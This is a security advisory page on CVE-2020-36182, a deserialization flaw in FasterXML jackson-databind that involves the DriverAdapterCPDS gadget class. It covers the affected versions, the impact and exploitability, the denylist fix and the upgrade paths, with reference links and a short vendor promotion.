CVE-2020-36182
Deserialization vulnerability in jackson-databind (Maven)
What is CVE-2020-36182 About?
This is a deserialization vulnerability in FasterXML jackson-databind versions 2.x before 2.9.10.8 and 2.6.7.5. It specifically involves the interaction between serialization gadgets and typing related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`. This vulnerability can lead to remote code execution. Exploitation depends on an attacker's ability to control serialized input.
Affected Software
- com.fasterxml.jackson.core:jackson-databind
- >2.0.0, <2.6.7.5
- >2.7.0, <2.9.10.8
Technical Details
The FasterXML jackson-databind library is prone to a deserialization flaw when handling org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS with polymorphic typing. When an application uses an affected version of jackson-databind to deserialize untrusted data and a malicious payload containing a reference to the DriverAdapterCPDS class is provided, the deserialization process can be manipulated. This causes DriverAdapterCPDS to execute attacker-controlled code, typically through JNDI lookups or class loading mechanisms, leading to arbitrary code execution on the server.
What is the Impact of CVE-2020-36182?
Successful exploitation may allow attackers to execute arbitrary code on the remote server, leading to potential complete system compromise, data theft, or denial of service.
What is the Exploitability of CVE-2020-36182?
Exploiting this deserialization vulnerability in jackson-databind requires crafting a specific malicious payload that targets the DriverAdapterCPDS gadget. The complexity is moderate to high, as it requires knowledge of the affected library version, the presence of the specific DriverAdapterCPDS class in the classpath, and construction of a valid deserialization chain. No authentication is inherently required if the deserialization endpoint is publicly accessible. This is a remote vulnerability, typically exploited by submitting the crafted payload via HTTP POST requests where JSON/XML is processed. Lack of input validation, reliance on default object deserialization, and the presence of the DriverAdapterCPDS class are key factors increasing exploitability.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | ||
What are the Available Fixes for CVE-2020-36182?
About the Fix from Resolved Security
The patch adds several new class names to the denylist in SubTypeValidator, preventing them from being deserialized by Jackson. This directly mitigates CVE-2020-36182, which is a remote code execution vulnerability triggered by unsafe polymorphic deserialization of certain classes; by explicitly blocking these classes, the patch closes this potential attack vector.
Available Upgrade Options
- com.fasterxml.jackson.core:jackson-databind
- >2.0.0, <2.6.7.5 → Upgrade to 2.6.7.5
- com.fasterxml.jackson.core:jackson-databind
- >2.7.0, <2.9.10.8 → Upgrade to 2.9.10.8
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://osv.dev/vulnerability/GHSA-89qr-369f-5m5x
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://security.netapp.com/advisory/ntap-20210205-0005
- https://www.oracle.com/security-alerts/cpuApr2021.html
- https://github.com/FasterXML/jackson-databind/commit/3ded28aece694d0df39c9f0fa1ff385b14a8656b
- https://www.oracle.com/security-alerts/cpuapr2022.html
What are Similar Vulnerabilities to CVE-2020-36182?
Similar Vulnerabilities: CVE-2020-24750 , CVE-2020-36184 , CVE-2020-24616 , CVE-2019-12814 , CVE-2019-14540
